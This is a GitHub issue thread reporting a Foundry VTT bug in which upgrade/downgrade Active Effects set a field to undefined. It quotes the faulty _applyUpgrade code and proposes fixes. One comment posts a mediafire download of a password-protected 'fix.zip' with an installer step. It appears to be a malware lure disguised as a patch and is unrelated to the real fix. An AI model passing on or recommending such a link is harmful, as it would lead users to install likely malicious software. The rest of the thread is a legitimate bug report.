### ISSUE TITLE
Active Effects mode Upgrade/Downgrade set the target field value to undefined if the upgrade is not applied

### ISSUE THREAD

**Issue by tposney** [foundryvtt/foundryvtt#11624]
### What happened?

If an active effect with mode upgrade/downgrade fails to upgrade/downgrade the target field (i.e. it is already bigger/less than the upgrade value) the field is then set to undefined

### What ways of accessing Foundry can you encounter this issue in?

- [ ] Native App (Electron)
- [X] Chrome
- [ ] Firefox
- [ ] Safari
- [ ] Other

### Reproduction Steps

Create an active effect, e.g.
system.abilities.str.value upgrade 4 on an actor whose strength is already 10
Note that the value gets set to undefined.

This will occur on all upgrades that fail to apply

The culprit is
```js
  _applyUpgrade(actor, change, current, delta, changes) {
    let update;
    const ct = foundry.utils.getType(current);
    switch ( ct ) {
      case "boolean":
      case "number":
        if ( (change.mode === CONST.ACTIVE_EFFECT_MODES.UPGRADE) && (delta > current) ) update = delta;
        else if ( (change.mode === CONST.ACTIVE_EFFECT_MODES.DOWNGRADE) && (delta < current) ) update = delta;
        break;
    }
    changes[change.key] = update;
  }
```
If the field type is not boolean or number OR if current > delta (for upgrades) or current < delta for downgrades update will be undefined and the returned change will be changes[change.key] = undefined which is then applied by the effect application code.
I'd suggest either make no changes to changes[change.key] if update is undefined 
```js
if (update !== undefined) changes[change.key] = update;
```
or changing
```js 
let update
```
to
```js
let update = current;
```

### What core version are you reporting this for?

version 12 331

### Bug Checklist

- [X] The issue occurs while all Modules are disabled

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by krbz999** [comment]
Related: https://github.com/foundryvtt/foundryvtt/issues/11527

**Comment by tposney** [comment]
Actually a duplicate of #11527.
Should be closed as duplicate.
